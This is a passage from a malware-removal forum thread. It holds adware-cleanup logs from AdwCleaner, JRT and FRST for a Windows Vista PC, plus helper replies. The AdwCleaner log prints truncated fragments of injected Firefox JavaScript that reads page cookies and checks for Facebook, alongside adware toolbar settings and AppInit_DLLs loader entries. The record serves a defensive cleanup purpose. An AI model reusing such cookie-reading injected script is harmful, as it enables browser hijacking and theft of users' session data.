Data Deleted : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - C:\PROGRA~1\SearchProtect\SearchProtect\bin\SPVC32Loader.dll
Data Deleted : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - c:\progra~1\optimi~1\optpro~2.dll

***** [ Browsers ] *****

-\\ Internet Explorer v7.0.6002.18005


-\\ Mozilla Firefox v33.0 (x86 en-US)

[ File : C:\Users\Bill\AppData\Roaming\Mozilla\Firefox\Profiles\klr418dz.default-1405037272113\prefs.js ]

Line Deleted : user_pref("extensions.HQsEy_PhSd.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumor[...]
Line Deleted : user_pref("extensions.U2fS1d7u.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorob[...]
Line Deleted : user_pref("extensions.hpw_wU.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.[...]
Line Deleted : user_pref("extensions.wt2D__OrbH0.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumo[...]

[ File : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\prefs.js ]

Line Deleted : user_pref("extensions.HQsEy_PhSd.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumor[...]
Line Deleted : user_pref("extensions.U2fS1d7u.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorob[...]
Line Deleted : user_pref("extensions.hpw_wU.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.[...]
Line Deleted : user_pref("extensions.wt2D__OrbH0.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumo[...]

[ File : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\prefs.js ]

Line Deleted : user_pref("extensions.HQsEy_PhSd.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumor[...]
Line Deleted : user_pref("extensions.U2fS1d7u.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorob[...]
Line Deleted : user_pref("extensions.hpw_wU.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.[...]
Line Deleted : user_pref("extensions.lg_GIGj.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo[...]
Line Deleted : user_pref("extensions.wt2D__OrbH0.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumo[...]

[ File : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\prefs.js ]


[ File : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\prefs.js ]

Line Deleted : user_pref("CT3074349..clientLogIsEnabled", true);
Line Deleted : user_pref("CT3074349..clientLogServiceUrl", "hxxp://clientlog.users.conduit.com/ClientDiagnostics.asmx/ReportDiagnosticsEvent");
Line Deleted : user_pref("CT3074349..uninstallLogServiceUrl", "hxxp://uninstall.users.conduit.com/Uninstall.asmx/RegisterToolbarUninstallation");
Line Deleted : user_pref("CT3074349.AboutPrivacyUrl", "hxxp://www.conduit.com/privacy/Default.aspx");
Line Deleted : user_pref("CT3074349.CTID", "CT3074349");
Line Deleted : user_pref("CT3074349.CurrentServerDate", "16-9-2011");
Line Deleted : user_pref("CT3074349.DialogsAlignMode", "LTR");
Line Deleted : user_pref("CT3074349.DialogsGetterLastCheckTime", "Thu Sep 15 2011 06:32:56 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.DownloadReferralCookieData", "");
Line Deleted : user_pref("CT3074349.FirstServerDate", "15-9-2011");
Line Deleted : user_pref("CT3074349.FirstTime", true);
Line Deleted : user_pref("CT3074349.FirstTimeFF3", true);
Line Deleted : user_pref("CT3074349.FixPageNotFoundErrors", true);
Line Deleted : user_pref("CT3074349.GroupingServerCheckInterval", 1440);
Line Deleted : user_pref("CT3074349.GroupingServiceUrl", "hxxp://grouping.services.conduit.com/");
Line Deleted : user_pref("CT3074349.HasUserGlobalKeys", true);
Line Deleted : user_pref("CT3074349.Initialize", true);
Line Deleted : user_pref("CT3074349.InitializeCommonPrefs", true);
Line Deleted : user_pref("CT3074349.InstallationAndCookieDataSentCount", 2);
Line Deleted : user_pref("CT3074349.InstallationType", "UnknownIntegration");
Line Deleted : user_pref("CT3074349.InstalledDate", "Thu Sep 15 2011 06:32:56 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.InvalidateCache", false);
Line Deleted : user_pref("CT3074349.IsGrouping", false);
Line Deleted : user_pref("CT3074349.IsInitSetupIni", true);
Line Deleted : user_pref("CT3074349.IsMulticommunity", false);
Line Deleted : user_pref("CT3074349.IsOpenThankYouPage", false);
Line Deleted : user_pref("CT3074349.IsOpenUninstallPage", true);
Line Deleted : user_pref("CT3074349.LanguagePackLastCheckTime", "Thu Sep 15 2011 06:32:59 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.LanguagePackReloadIntervalMM", 1440);
Line Deleted : user_pref("CT3074349.LanguagePackServiceUrl", "hxxp://translation.users.conduit.com/Translation.ashx");
Line Deleted : user_pref("CT3074349.LastLogin_3.6.0.10", "Thu Sep 15 2011 20:24:45 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.LatestVersion", "3.6.0.10");
Line Deleted : user_pref("CT3074349.Locale", "en");
Line Deleted : user_pref("CT3074349.MCDetectTooltipHeight", "83");
Line Deleted : user_pref("CT3074349.MCDetectTooltipUrl", "hxxp://@EB_INSTALL_LINK@/rank/tooltip/?version=1");
Line Deleted : user_pref("CT3074349.MCDetectTooltipWidth", "295");
Line Deleted : user_pref("CT3074349.MyStuffEnabledAtInstallation", true);
Line Deleted : user_pref("CT3074349.OriginalFirstVersion", "3.6.0.10");
Line Deleted : user_pref("CT3074349.RadioIsPodcast", false);
Line Deleted : user_pref("CT3074349.RadioLastCheckTime", "Thu Sep 15 2011 06:32:59 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.RadioLastUpdateIPServer", "3");
Line Deleted : user_pref("CT3074349.RadioLastUpdateServer", "3");
Line Deleted : user_pref("CT3074349.RadioMediaID", "9962");
Line Deleted : user_pref("CT3074349.RadioMediaType", "Media Player");
Line Deleted : user_pref("CT3074349.RadioMenuSelectedID", "EBRadioMenu_CT30743499962");
Line Deleted : user_pref("CT3074349.RadioShrinkedFromSetup", false);
Line Deleted : user_pref("CT3074349.RadioStationName", "California%20Rock");
Line Deleted : user_pref("CT3074349.RadioStationURL", "hxxp://feedlive.net/california.asx");
Line Deleted : user_pref("CT3074349.SavedHomepage", "about:blank");
Line Deleted : user_pref("CT3074349.SearchFromAddressBarIsInit", true);
Line Deleted : user_pref("CT3074349.SearchInNewTabEnabled", true);
Line Deleted : user_pref("CT3074349.SearchInNewTabIntervalMM", 1440);
Line Deleted : user_pref("CT3074349.SearchInNewTabLastCheckTime", "Thu Sep 15 2011 06:32:59 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.SearchInNewTabServiceUrl", "hxxp://newtab.conduit-hosting.com/newtab/?ctid=EB_TOOLBAR_ID");
Line Deleted : user_pref("CT3074349.SearchInNewTabUsageUrl", "hxxp://Usage.Hosting.conduit-services.com/UsageService.asmx/UsersRequests?ctid=EB_TOOLBAR_ID");
Line Deleted : user_pref("CT3074349.SearchInNewTabUserEnabled", false);
Line Deleted : user_pref("CT3074349.SearchProtectorToolbarDisabled", true);
Line Deleted : user_pref("CT3074349.ServiceMapLastCheckTime", "Thu Sep 15 2011 06:32:54 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.SettingsLastCheckTime", "Thu Sep 15 2011 20:24:41 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.SettingsLastUpdate", "1314715212");
Line Deleted : user_pref("CT3074349.ThirdPartyComponentsInterval", 504);
Line Deleted : user_pref("CT3074349.ThirdPartyComponentsLastCheck", "Thu Sep 15 2011 06:32:54 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.ThirdPartyComponentsLastUpdate", "1312887586");
Line Deleted : user_pref("CT3074349.ToolbarDisabled", false);
Line Deleted : user_pref("CT3074349.ToolbarShrinkedFromSetup", false);
Line Deleted : user_pref("CT3074349.TrusteLinkUrl", "hxxp://trust.conduit.com/CT3074349");
Line Deleted : user_pref("CT3074349.TrustedApiDomains", "conduit.com,conduit-hosting.com,conduit-services.com,client.conduit-storage.com,OurToolbar.com,CommunityToolbars.com,ForumToolbar.com,MyBlogToolbar.com,MyCity[...]
Line Deleted : user_pref("CT3074349.Uninstall", true);
Line Deleted : user_pref("CT3074349.UserID", "UN72577828490742812");
Line Deleted : user_pref("CT3074349.WeatherNetwork", "");
Line Deleted : user_pref("CT3074349.WeatherPollDate", "Thu Sep 15 2011 20:24:42 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.WeatherUnit", "F");
Line Deleted : user_pref("CT3074349.alertChannelId", "1465784");
Line Deleted : user_pref("CT3074349.generalConfigFromLogin", "{\"ApiMaxAlerts\":\"12\",\"SocialDomains\":\"social.conduit.com;apps.conduit.com;services.apps.conduit.com\",\"AppsDetectionUrlPattern\":\"hxxp://appdown[...]
Line Deleted : user_pref("CT3074349.globalFirstTimeInfoLastCheckTime", "Thu Sep 15 2011 20:24:42 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.homepageProtectorEnableByLogin", true);
Line Deleted : user_pref("CT3074349.initDone", true);
Line Deleted : user_pref("CT3074349.isAppTrackingManagerOn", true);
Line Deleted : user_pref("CT3074349.isFirstRadioInstallation", false);
Line Deleted : user_pref("CT3074349.myStuffEnabled", true);
Line Deleted : user_pref("CT3074349.myStuffPublihserMinWidth", 400);
Line Deleted : user_pref("CT3074349.myStuffSearchUrl", "hxxp://Apps.conduit.com/search?q=SEARCH_TERM&SearchSourceOrigin=29&ctid=EB_TOOLBAR_ID&octid=EB_ORIGINAL_CTID");
Line Deleted : user_pref("CT3074349.myStuffServiceIntervalMM", 1440);
Line Deleted : user_pref("CT3074349.myStuffServiceUrl", "hxxp://mystuff.conduit-services.com/MyStuffService.ashx?ComponentId=EB_MY_STUFF_INSTANCE_GUID&lut=EB_MY_STUFF_LUT");
Line Deleted : user_pref("CT3074349.oldAppsList", "129446538071425236,129574421762864744,111,129574421763479940,1000082,129574421763997487,1000234,129574421764495504,129574421764505270,129574421764515036,1000034,100[...]
Line Deleted : user_pref("CT3074349.searchProtectorDialogDelayInSec", 10);
Line Deleted : user_pref("CT3074349.searchProtectorEnableByLogin", true);
Line Deleted : user_pref("CT3074349.testingCtid", "");
Line Deleted : user_pref("CT3074349.toolbarAppMetaDataLastCheckTime", "Thu Sep 15 2011 06:32:56 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.toolbarContextMenuLastCheckTime", "Thu Sep 15 2011 06:32:59 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CT3074349.usagesFlag", 1);
Line Deleted : user_pref("CommunityToolbar.ConduitHomepagesList", "hxxp://search.conduit.com/?ctid=CT3074349&SearchSource=13");
Line Deleted : user_pref("CommunityToolbar.ConduitSearchList", "PhotoJoy US Customized Web Search,uTorrentControl2 Customized Web Search");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://Settings.toolbar.search.conduit.com/root/CT3072253/CT3072253", "\"76b4669a117e81f713161171f6d50d821\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://alerts.conduit-services.com/root/1463702/1459356/US", "\"0\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://alerts.conduit-services.com/root/1465784/1461438/US", "\"0\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://appsmetadata.toolbar.conduit-services.com/?ctid=CT3072253", "\"1336063965\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://appsmetadata.toolbar.conduit-services.com/?ctid=CT3074349", "\"1312968577\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://contextmenu.toolbar.conduit-services.com/?name=GottenApps&locale=en", "C5ZJe6gL80JBW5CuLy+wkg==");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://contextmenu.toolbar.conduit-services.com/?name=OtherApps&locale=en", "2E1/v7EfCEDbv3VaBQMELg==");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://contextmenu.toolbar.conduit-services.com/?name=SharedApps&locale=en", "k9un27OkAvkwB2ZmvXxTnA==");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://contextmenu.toolbar.conduit-services.com/?name=Toolbar&locale=en", "4BgM4MhF/sOgPsDNmIs3Yw==");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://dynamicdialogs.alert.conduit-services.com/alert/dlg.pkg", "\"8076e3ce381dcd1:0\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://dynamicdialogs.toolbar.conduit-services.com/DLG.pkg?ver=3.13.0.6", "\"4ead38b3e6bcd1:145a\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://dynamicdialogs.toolbar.conduit-services.com/DLG.pkg?ver=3.6.0.10", "\"80ee9485875dcc1:1192\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://servicemap.conduit-services.com/Toolbar/?ownerId=CT3072253", "\"d76323372b05c3748a3d6b1c93a98292\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://servicemap.conduit-services.com/Toolbar/?ownerId=CT3074349", "\"634515122457000000\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://settings.toolbar.conduit-services.com/?ctid=CT3074349&octid=CT3074349", "\"1314715212\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://storage.conduit.com/BankImages/RadioSkins/Midnight/equalizer_dead.gif", "\"03e383867bc91:0\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://storage.conduit.com/BankImages/RadioSkins/Midnight/minimize.gif", "\"0e685fa27bc91:0\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://storage.conduit.com/BankImages/RadioSkins/Midnight/play.gif", "\"02faea337c7c91:0\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://storage.conduit.com/BankImages/RadioSkins/Midnight/stop.gif", "\"03a54d7f47ac91:0\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://storage.conduit.com/BankImages/RadioSkins/Midnight/vol.gif", "\"049b47644c7c91:0\"");
Line Deleted : user_pref("CommunityToolbar.ETag.hxxp://translation.toolbar.conduit-services.com/?locale=en", "\"1c8884e1d7013beea7adb5fd75562429\"");
Line Deleted : user_pref("CommunityToolbar.LatestLibsPath", "file:///C:\\Users\\Nick\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\ghs5oui9.default\\conduitCommon\\modules\\3.13.0.6");
Line Deleted : user_pref("CommunityToolbar.LatestToolbarVersionInstalled", "3.13.0.6");
Line Deleted : user_pref("CommunityToolbar.SearchFromAddressBarSavedUrl", "hxxp://www.bing.com/search?pc=Z016&form=ZGAADF&q=");
Line Deleted : user_pref("CommunityToolbar.ToolbarsList", "CT3074349");
Line Deleted : user_pref("CommunityToolbar.ToolbarsList2", "CT3074349");
Line Deleted : user_pref("CommunityToolbar.ToolbarsList4", "CT3074349");
Line Deleted : user_pref("CommunityToolbar.globalUserId", "cc216d56-d7ed-4ac3-8282-651bea8138ff");
Line Deleted : user_pref("CommunityToolbar.isAlertUrlAddedToFeedItemTable", true);
Line Deleted : user_pref("CommunityToolbar.isClickActionAddedToFeedItemTable", true);
Line Deleted : user_pref("CommunityToolbar.keywordURLSelectedCTID", "CT3072253");
Line Deleted : user_pref("CommunityToolbar.notifications.alertDialogsGetterLastCheckTime", "Fri Jun 08 2012 00:17:45 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CommunityToolbar.notifications.alertEnabled", true);
Line Deleted : user_pref("CommunityToolbar.notifications.alertInfoInterval", 1440);
Line Deleted : user_pref("CommunityToolbar.notifications.alertInfoLastCheckTime", "Fri Jun 08 2012 12:36:14 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CommunityToolbar.notifications.clientsServerUrl", "hxxp://alert.client.conduit.com");
Line Deleted : user_pref("CommunityToolbar.notifications.locale", "en");
Line Deleted : user_pref("CommunityToolbar.notifications.loginIntervalMin", 1440);
Line Deleted : user_pref("CommunityToolbar.notifications.loginLastCheckTime", "Fri Jun 08 2012 00:17:44 GMT-0700 (Pacific Daylight Time)");
Line Deleted : user_pref("CommunityToolbar.notifications.loginLastUpdateTime", "1313487611");
Line Deleted : user_pref("CommunityToolbar.notifications.messageShowTimeSec", 20);
Line Deleted : user_pref("CommunityToolbar.notifications.servicesServerUrl", "hxxp://alert.services.conduit.com");
Line Deleted : user_pref("CommunityToolbar.notifications.showTrayIcon", false);
Line Deleted : user_pref("CommunityToolbar.notifications.userCloseIntervalMin", 300);
Line Deleted : user_pref("CommunityToolbar.notifications.userId", "5da594d4-182c-41cf-960d-e9dcf87f3b75");
Line Deleted : user_pref("CommunityToolbar.originalHomepage", "hxxp://www.google.com/");
Line Deleted : user_pref("CommunityToolbar.originalSearchEngine", "chrome://browser-region/locale/region.properties");
Line Deleted : user_pref("browser.search.defaultthis.engineName", "uTorrentControl2 Customized Web Search");
Line Deleted : user_pref("extensions.HQsEy_PhSd.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumor[...]
Line Deleted : user_pref("extensions.U2fS1d7u.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorob[...]
Line Deleted : user_pref("extensions.hpw_wU.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.[...]
Line Deleted : user_pref("extensions.lg_GIGj.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo[...]
Line Deleted : user_pref("extensions.wt2D__OrbH0.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumo[...]

-\\ Google Chrome v35.0.1916.153

[ File : C:\Users\Bill\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Deleted [Search Provider] : hxxp://search.aol.com/aol/search?query={searchTerms}
Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
Deleted [Extension] : booedmolknjekdopkepjjeckmjkdpfgl
Deleted [Extension] : flpcjncodpafbgdpnkljologafpionhb

[ File : C:\Users\Dylan\AppData\Local\Google\Chrome\User Data\Default\preferences ]


[ File : C:\Users\Hannah\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Deleted [Search Provider] : hxxp://search.aol.com/aol/search?query={searchTerms}
Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
Deleted [Search Provider] : hxxp://www.trovi.com/Results.aspx?gd=&ctid=CT3319598&octid=EB_ORIGINAL_CTID&ISID=M180E7AAF-7B0C-4944-94F1-C3AD338C4DD6&SearchSource=58&CUI=&UM=5&UP=SP9F1267DC-924A-4FA2-8BD3-B25688915483&q={searchTerms}&SSPV=

[ File : C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Deleted [Search Provider] : hxxp://search.aol.com/aol/search?query={searchTerms}
Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}

*************************

AdwCleaner[R0].txt - [31099 octets] - [01/11/2014 10:55:50]
AdwCleaner[R1].txt - [31160 octets] - [01/11/2014 11:16:01]
AdwCleaner[S0].txt - [26790 octets] - [01/11/2014 11:31:44]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [26851 octets] ##########
 

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.3.5 (10.31.2014:1)
OS: Windows Vista ™ Ultimate x86
Ran by Nick on Sat 11/01/2014 at 11:40:18.00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services



~~~ Registry Values



~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog\Application\update rightsurf
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog\Application\util rightsurf
Successfully deleted: [Registry Key - Orphan] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{626F3344-6A64-3995-E8E7-11D63F841162}
Successfully deleted: [Registry Key - Orphan] HKEY_CLASSES_ROOT\CLSID\{626F3344-6A64-3995-E8E7-11D63F841162}
Successfully deleted: [Registry Key - Orphan] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6D5C04CD-A77C-BAB9-6494-57DA426BB009}
Successfully deleted: [Registry Key - Orphan] HKEY_CLASSES_ROOT\CLSID\{6D5C04CD-A77C-BAB9-6494-57DA426BB009}



~~~ Files



~~~ Folders

Successfully deleted: [Folder] "C:\Users\Nick\Local Settings\Application Data\cre"
Successfully deleted: [Folder] "C:\Program Files\eusing free registry cleaner"
Successfully deleted: [Folder] "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\free registry cleaner"
Successfully deleted: [Folder] "C:\Users\Nick\AppData\Roaming\microsoft\windows\start menu\programs\free registry cleaner"



~~~ FireFox

Successfully deleted: [File] C:\Users\Nick\AppData\Roaming\mozilla\firefox\profiles\ghs5oui9.default\searchplugins\bing-zugo.xml
Successfully deleted the following from C:\Users\Nick\AppData\Roaming\mozilla\firefox\profiles\ghs5oui9.default\prefs.js

user_pref("extensions.searchtoolbar@zugo.com.install-event-fired", true);
Emptied folder: C:\Users\Nick\AppData\Roaming\mozilla\firefox\profiles\ghs5oui9.default\minidumps [116 files]



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Sat 11/01/2014 at 11:45:22.75
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 

 

 

 

Attached Files



#8 Jo*

Jo*

  • Malware Response Team
  • 3,319 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:08:33 PM

Posted 01 November 2014 - 02:53 PM

I need the FRST.txt from the 2nd scan with FRST.

Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.


#9 topper8281

topper8281
  • Topic Starter

  • Members
  • 33 posts
  • OFFLINE
  •  
  • Local time:11:33 AM

Posted 01 November 2014 - 03:03 PM

I posted it. it's just that the scan came up empty.



#10 Jo*

Jo*

  • Malware Response Team
  • 3,319 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:08:33 PM

Posted 01 November 2014 - 03:22 PM


Run FRST again from your Desktop (C:\Users\Nick\Desktop).

Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.


#11 topper8281

topper8281
  • Topic Starter

  • Members
  • 33 posts
  • OFFLINE
  •  
  • Local time:11:33 AM

Posted 01 November 2014 - 05:37 PM

I will as soon as I get a chance.

#12 topper8281

topper8281
  • Topic Starter

  • Members
  • 33 posts
  • OFFLINE
  •  
  • Local time:11:33 AM

Posted 02 November 2014 - 12:26 AM

Okay Jo. Here is the latest FRST scan result.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 01-11-2014
Ran by Nick (administrator) on WALKER-PC on 01-11-2014 22:24:09
Running from C:\Users\Nick\Desktop
Loaded Profile: Nick (Available profiles: Kristi & Hannah & Nick & Bill & UpdatusUser & Dylan & Administrator)
Platform: Microsoft® Windows Vista™ Ultimate  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 7
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\LogonUI.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(AVAST Software) C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(LogMeIn Inc.) C:\Program Files\LogMeIn Hamachi\hamachi-2.exe
(UltraVNC) C:\Program Files\uvnc bvba\UltraVNC\winvnc.exe
(Avast Software) C:\Program Files\Alwil Software\Avast5\ng\vbox\AvastVBoxSVC.exe
(UltraVNC) C:\Program Files\uvnc bvba\UltraVNC\winvnc.exe
(Microsoft Corporation) C:\Windows\System32\rdpclip.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(AVAST Software) C:\Program Files\Alwil Software\Avast5\avastui.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(Google Inc.) C:\Users\Nick\AppData\Local\Google\Update\GoogleUpdate.exe
(Spotify Ltd) C:\Users\Nick\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.0.285\SSScheduler.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\NvXDSync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-19] (Microsoft Corporation)
HKLM\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files\Adobe\Reader 10.0\Reader\Reader_sl.exe [35736 2010-11-10] (Adobe Systems Incorporated)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [932288 2010-11-10] (Adobe Systems Incorporated)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-04-23] (Apple Inc.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated)
HKLM\...\Run: [SwitchBoard] => C:\Program Files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM\...\Run: [AdobeCS6ServiceManager] => C:\Program Files\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2013-05-01] (Apple Inc.)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\Alwil Software\Avast5\AvastUI.exe [5223016 2014-10-31] (AVAST Software)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-05-26] (Apple Inc.)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [507776 2014-10-07] (Oracle Corporation)
HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
